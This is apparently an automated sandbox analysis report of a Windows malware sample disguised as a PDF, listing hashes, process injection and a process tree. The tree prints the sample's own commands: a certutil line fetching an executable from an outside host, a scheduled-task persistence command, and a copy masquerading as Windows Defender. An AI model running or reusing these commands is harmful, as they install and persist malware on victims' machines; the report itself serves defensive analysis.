2d22eda50d8a63f41962bbd045a86889dd24d78b1bea65d1dc8006504d77faa7

General

Target

doc_80118400-13.pdf.exe
Size

217KB
MD5

4a839563f793df5802e607d977c23f03
SHA1

6f39139fabb6e37bc5a48d27abb6bcfe3fef6672
SHA256

2d22eda50d8a63f41962bbd045a86889dd24d78b1bea65d1dc8006504d77faa7
SHA512

c00f4c4997dd092357c7651f1c72ffa05f7a73f1993f3fcd243f615b6ec42e75b8c0c050d2152395e24ee02d43572f67bcff0923e475eddde556eb58c36d2699

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

windows defender.exewindows defender.exe

pid process

1088 windows defender.exe
268 windows defender.exe

pid	process
1088	windows defender.exe
268	windows defender.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

doc_80118400-13.pdf.exewindows defender.exe

description	pid	process	target process
PID 1528 set thread context of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1088 set thread context of 1660	1088	windows defender.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

808 schtasks.exe
1772 schtasks.exe

pid	process
808	schtasks.exe
1772	schtasks.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

doc_80118400-13.pdf.exewindows defender.exewindows defender.exe

description	pid	process
Token: SeDebugPrivilege	1528	doc_80118400-13.pdf.exe
Token: SeDebugPrivilege	1088	windows defender.exe
Token: SeDebugPrivilege	268	windows defender.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

doc_80118400-13.pdf.execmd.exetaskeng.exewindows defender.execmd.exeRegAsm.execmd.exe

description	pid	process	target process
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 1288	1528	doc_80118400-13.pdf.exe	RegAsm.exe
PID 1528 wrote to memory of 844	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 1528 wrote to memory of 844	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 1528 wrote to memory of 844	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 1528 wrote to memory of 844	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 1528 wrote to memory of 1052	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 1528 wrote to memory of 1052	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 1528 wrote to memory of 1052	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 1528 wrote to memory of 1052	1528	doc_80118400-13.pdf.exe	cmd.exe
PID 844 wrote to memory of 808	844	cmd.exe	schtasks.exe
PID 844 wrote to memory of 808	844	cmd.exe	schtasks.exe
PID 844 wrote to memory of 808	844	cmd.exe	schtasks.exe
PID 844 wrote to memory of 808	844	cmd.exe	schtasks.exe
PID 1556 wrote to memory of 1088	1556	taskeng.exe	windows defender.exe
PID 1556 wrote to memory of 1088	1556	taskeng.exe	windows defender.exe
PID 1556 wrote to memory of 1088	1556	taskeng.exe	windows defender.exe
PID 1556 wrote to memory of 1088	1556	taskeng.exe	windows defender.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1660	1088	windows defender.exe	RegAsm.exe
PID 1088 wrote to memory of 1300	1088	windows defender.exe	cmd.exe
PID 1088 wrote to memory of 1300	1088	windows defender.exe	cmd.exe
PID 1088 wrote to memory of 1300	1088	windows defender.exe	cmd.exe
PID 1088 wrote to memory of 1300	1088	windows defender.exe	cmd.exe
PID 1088 wrote to memory of 1140	1088	windows defender.exe	cmd.exe
PID 1088 wrote to memory of 1140	1088	windows defender.exe	cmd.exe
PID 1088 wrote to memory of 1140	1088	windows defender.exe	cmd.exe
PID 1088 wrote to memory of 1140	1088	windows defender.exe	cmd.exe
PID 1300 wrote to memory of 1772	1300	cmd.exe	schtasks.exe
PID 1300 wrote to memory of 1772	1300	cmd.exe	schtasks.exe
PID 1300 wrote to memory of 1772	1300	cmd.exe	schtasks.exe
PID 1300 wrote to memory of 1772	1300	cmd.exe	schtasks.exe
PID 1660 wrote to memory of 956	1660	RegAsm.exe	cmd.exe
PID 1660 wrote to memory of 956	1660	RegAsm.exe	cmd.exe
PID 1660 wrote to memory of 956	1660	RegAsm.exe	cmd.exe
PID 1660 wrote to memory of 956	1660	RegAsm.exe	cmd.exe
PID 956 wrote to memory of 1620	956	cmd.exe	certutil.exe
PID 956 wrote to memory of 1620	956	cmd.exe	certutil.exe
PID 956 wrote to memory of 1620	956	cmd.exe	certutil.exe
PID 1556 wrote to memory of 268	1556	taskeng.exe	windows defender.exe

C:\Users\Admin\AppData\Local\Temp\doc_80118400-13.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\doc_80118400-13.pdf.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanos" /tr "'C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe'" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nanos" /tr "'C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe'" /f
3⤵
- Creates scheduled task(s)
PID:808

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\doc_80118400-13.pdf.exe" "C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe"
2⤵
PID:1052

C:\Windows\system32\taskeng.exe
taskeng.exe {B105ACCF-DA37-475B-9E43-77B76548FB71} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe
"C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F37.tmp\6F38.tmp\6F39.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f https://voidtools.xyz/vv/smm.exe smm.exe
5⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanos" /tr "'C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe'" /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nanos" /tr "'C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe'" /f
4⤵
- Creates scheduled task(s)
PID:1772

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe" "C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe"
3⤵
PID:1140

C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe
"C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:268

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6F37.tmp\6F38.tmp\6F39.bat
MD5
a59ef10acd59fbcd30eede20908b7e29

SHA1
ae1bcab4d2e18a8643eff40c4c9609288b19bcb0

SHA256
8e1c4598340dddc30b203a9fd622a4d83a2b31ae0d6ed6422fac1daa51b8f968

SHA512
e7d022160c52bb4bff70bfddcf5513c79d9b25e73b4ad5cdab451b1879deab5b8de36a89f48a991174ba78f24d65bf0788970f40be04e36e87b5e5fe374ee0e9

Download Submit
C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe
MD5
4a839563f793df5802e607d977c23f03

SHA1
6f39139fabb6e37bc5a48d27abb6bcfe3fef6672

SHA256
2d22eda50d8a63f41962bbd045a86889dd24d78b1bea65d1dc8006504d77faa7

SHA512
c00f4c4997dd092357c7651f1c72ffa05f7a73f1993f3fcd243f615b6ec42e75b8c0c050d2152395e24ee02d43572f67bcff0923e475eddde556eb58c36d2699

Download Submit
C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe
MD5
4a839563f793df5802e607d977c23f03

SHA1
6f39139fabb6e37bc5a48d27abb6bcfe3fef6672

SHA256
2d22eda50d8a63f41962bbd045a86889dd24d78b1bea65d1dc8006504d77faa7

SHA512
c00f4c4997dd092357c7651f1c72ffa05f7a73f1993f3fcd243f615b6ec42e75b8c0c050d2152395e24ee02d43572f67bcff0923e475eddde556eb58c36d2699

Download Submit
C:\Users\Admin\AppData\Roaming\windows defender\windows defender.exe
MD5
4a839563f793df5802e607d977c23f03

SHA1
6f39139fabb6e37bc5a48d27abb6bcfe3fef6672

SHA256
2d22eda50d8a63f41962bbd045a86889dd24d78b1bea65d1dc8006504d77faa7

SHA512
c00f4c4997dd092357c7651f1c72ffa05f7a73f1993f3fcd243f615b6ec42e75b8c0c050d2152395e24ee02d43572f67bcff0923e475eddde556eb58c36d2699

Download Submit
memory/268-101-0x0000000001220000-0x0000000001221000-memory.dmp

Filesize
4KB

Download
memory/268-99-0x0000000001320000-0x0000000001321000-memory.dmp

Filesize
4KB

Download
memory/268-97-0x0000000000000000-mapping.dmp

Download
memory/808-72-0x0000000000000000-mapping.dmp

Download
memory/844-70-0x0000000000000000-mapping.dmp

Download
memory/956-92-0x0000000000000000-mapping.dmp

Download
memory/1052-71-0x0000000000000000-mapping.dmp

Download
memory/1088-76-0x0000000001320000-0x0000000001321000-memory.dmp

Filesize
4KB

Download
memory/1088-78-0x00000000049E0000-0x00000000049E1000-memory.dmp

Filesize
4KB

Download
memory/1088-74-0x0000000000000000-mapping.dmp

Download
memory/1140-89-0x0000000000000000-mapping.dmp

Download
memory/1288-63-0x0000000000090000-0x00000000000AA000-memory.dmp

Filesize
104KB

Download
memory/1288-61-0x0000000000090000-0x00000000000AA000-memory.dmp

Filesize
104KB

Download
memory/1288-58-0x0000000000090000-0x00000000000AA000-memory.dmp

Filesize
104KB

Download
memory/1288-65-0x0000000000401000-mapping.dmp

Download
memory/1288-59-0x0000000000090000-0x00000000000AA000-memory.dmp

Filesize
104KB

Download
memory/1288-60-0x0000000000090000-0x00000000000AA000-memory.dmp

Filesize
104KB

Download
memory/1288-62-0x0000000000090000-0x00000000000AA000-memory.dmp

Filesize
104KB

Download
memory/1288-66-0x0000000000090000-0x00000000000AA000-memory.dmp

Filesize
104KB

Download
memory/1300-88-0x0000000000000000-mapping.dmp

Download
memory/1528-55-0x00000000000E0000-0x00000000000E1000-memory.dmp

Filesize
4KB

Download
memory/1528-57-0x0000000004C50000-0x0000000004C51000-memory.dmp

Filesize
4KB

Download
memory/1620-95-0x0000000000000000-mapping.dmp

Download
memory/1620-96-0x00000000FF7C1000-0x00000000FF7C3000-memory.dmp

Filesize
8KB

Download
memory/1660-93-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/1660-91-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/1660-87-0x0000000076081000-0x0000000076083000-memory.dmp

Filesize
8KB

Download
memory/1660-86-0x0000000000401000-mapping.dmp

Download
memory/1772-90-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads